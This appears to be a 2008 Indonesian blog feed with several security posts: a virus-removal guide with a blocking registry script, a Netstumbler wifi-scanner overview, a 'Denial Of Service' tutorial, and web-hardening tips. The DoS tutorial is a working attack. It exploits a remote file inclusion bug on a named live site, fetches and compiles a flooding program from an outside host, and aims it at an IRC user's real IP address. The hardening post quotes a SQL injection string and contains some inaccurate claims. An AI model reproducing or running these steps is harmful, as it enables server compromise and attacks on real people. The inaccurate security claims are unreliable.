- Pada layar "Folder Options", klik tabulasi "View"
- Pada folder "Hidden files and folders", hilangkan tanda centang pada opsi "Hide extensions for known file types" dan "Hide protected operating system files (recomended)"
- Klik tombol "Ok"

Untuk mencari dan menghapus file virus, lakukan langkah berikut:

- Klik "Start" menu
- Klik "Search", kemudian klik "For Files or Folders"
- Setelah muncul layar "Search Result", klik menu "All files and folders"
- Kemudian pada kolom "All or part of the file name" isi dengan ekstensi *.EXE
- Pada kolom "Look in", pastikan sudah menuju ke lokasi Drive yang akan diperiksa termasuk ke lokasi Flash Disk.
- Klik menu "What size is it", kemudian pilih opsi "Specify size (in KB)

* Pilih "at most"
* Isi dengan ukuran "42"

- Klik menu "More Advanced option", kemudian pilih opsi

* Searh system folders
* Search hidden files and folders
* Search subfolders

- Kemudian klik tombol "Search" untuk memulai proses pencarian
- Hapus file virus disemua drive termasuk flash disk yang mempunyai ciri-ciri: icon winamp, ukuran 42 KB, type file "Application", ekstensi .EXE

5. Hapus juga file desktop.ini, folder.htt, Autorun.inf dan anbu.txt di flash disk.

6. Untuk pembersihan maksimal dan mencegah infeksi ulang, scan dengan anti virus yang up-to-date dan sudah dapat mengenali virus ini dengan baik.

7. Untuk mencegah agar virus tidak otomatis aktif pada saat akses ke suatu drive sebaiknya Anda matikan fungsi autoplay.

8. Untuk antisipasi agar virus ini tidak kembali menginfeksi komputer anda selain dengan menginstall antivirus yang up-to-date, juga dapat membuat script sederhana untuk mematikan proses virus ini jika berusaha aktif di memori caranya, salin script dibawah ini pada program notepad kemudian simpan dengan nama RemoveHokage.reg. Kemudian jalankan file tersebut (klik 2x), klik "Yes" jika terdapat konfirmasi untuk menambahkan registri tersebut.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HOKAGE4.exe]
"Debugger"="cmd.exe /c del"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HokageFile.exe]
"Debugger"="cmd.exe /c del"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KakashiHatake.exe]
"Debugger"="cmd.exe /c del"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rin.exe]
"Debugger"="cmd.exe /c del"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Obito.exe]
"Debugger"="cmd.exe /c del"

Mengenal Tool Netstumbler

noreply@blogger.com (adesurya-online.blogspot.com) — Sun, 13 Apr 2008 22:26:00 +0000

Tip wifi kali ini mempersembahkan tool atau software freeware Netstumbler yang amat populer di kalangan aktivis wireless, tool ini berjalan di lingkungan Windows, dengan tool ini kita bisa mendeteksi sinyal jaringan wifi yang lagi aktif, dengan mengetahui sinyal-sinyal yang aktif saat ini, kita bisa memantau besarnya interferensi di lingkungan kita berada, Netstumbler ini juga bisa menangkap sinyal wifi yang lebih jauh dari yang bisa ditangkap oleh software monitoring bawaan device wifi standard.
Umumnya tool ini dipergunakan untuk keperluan hacking, pengujian konfigurasi jaringan, survey besarnya interferensi, menemukan tempat yang sepi dari jaringan wifi, dan memposisikan ketepatan arah antena(pointing).
Sayangnya netstumbler ini bisa disalah gunakan oleh orang untuk menemukan jaringan wifi yang rentan securitynya, lalu dia bisa menggunakan sedikit upaya untuk membobolnya, jadi bisa internetan gratis nih. Oleh karena itu pergunakan langkah security yang maksimal pada akses point anda, bila akses poin anda security WEP dan WPA nya aktif, maka Netstumbler akan memunculkan gambar gembok pada sinyal wifi yang WEP atau WPA nya aktif, so jangan coba-coba meremehkan perkara.

Disamping itu Netstumbler bisa melakukan monitoring channel-channel yang dipergunakan, kekuatan sinyal wifi, menampilkan SSID yang terdeteksi. Netstumbler juga bisa disandingkan dengan perangkat GPS, alhasil kita bisa memetakan jaringan wifi yang berada pada satu tempat, ini biasanya dilakukan sambil berjalan, juga melaporkan MAC Address akses poin plus frekuensi operasinya, mencatat level noise, serta perbandingannya dengan level kekuatan sinyal.
So tip wifi kali ini memberi saran kepada anda untuk men-disable broadcast SSID anda agar jaringan wifi anda tersembunyi, tidak bisa terdeteksi lagi oleh Netstumbler atau tool lainnya yang sejenis (meskipun demikian ada beberapa tool yang mampu memonitor SSID yang sudah ter-hidden/tersembunyi), tool buatan Marius Milner ini bisa didownload gratis di www.netstumbler.com.

TEKNIK Denial Of Service

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 09 Apr 2008 11:34:00 +0000

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/jambihackerlinkcrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://www.freewebs.com/jambihackerlink/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.

All logos and trademarks in this site are property of their respective owner. All the rest © 2005 by J4mbi H4ck3r.

Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 09 Apr 2008 11:29:00 +0000

Percaya atau tidak kalau mengamankan web itu lebih sulit daripada merusak tampilan atau merusak database dari web tersebut.
Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan webmaster masih sering dilakukan.

1. Pencegahan SQL Injection, contoh sintak SQL Injection :

?or 1=1--

Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (--), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql: mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :

Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal.....! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.

3. Pemasukkan Tag HTML. Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars). Contoh script :

function cleanup($value="", $preserve="", $tag="") {
if (empty($preserve)) {
$value=strip_tags($value, $allowed_tags);
}
$value=htmlspecialchars($value);
return $value;
}

4. Batasi penggunaan Java Script dan jangan menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup matinya web anda, karena java script bersifat client dan membuat akses yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti PHP dan ASP karena sudah bersifat server.

5. Penyimpanan file database sebaiknya disimpan dlm directory private. Jangan pernah menyimpannya di directory public yang memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting sudah menyediakan direktori khusus untuk database. Dalam keamanan database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi dengan SSL. Data yang penting jangan disimpan secara langsung melainkan sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512 atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.

6. Berhati hatilah memilih webhosting, itu sudah kami buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang diserang kita tidak bisa berbuat apa apa.

______HACKING INSPIRATION______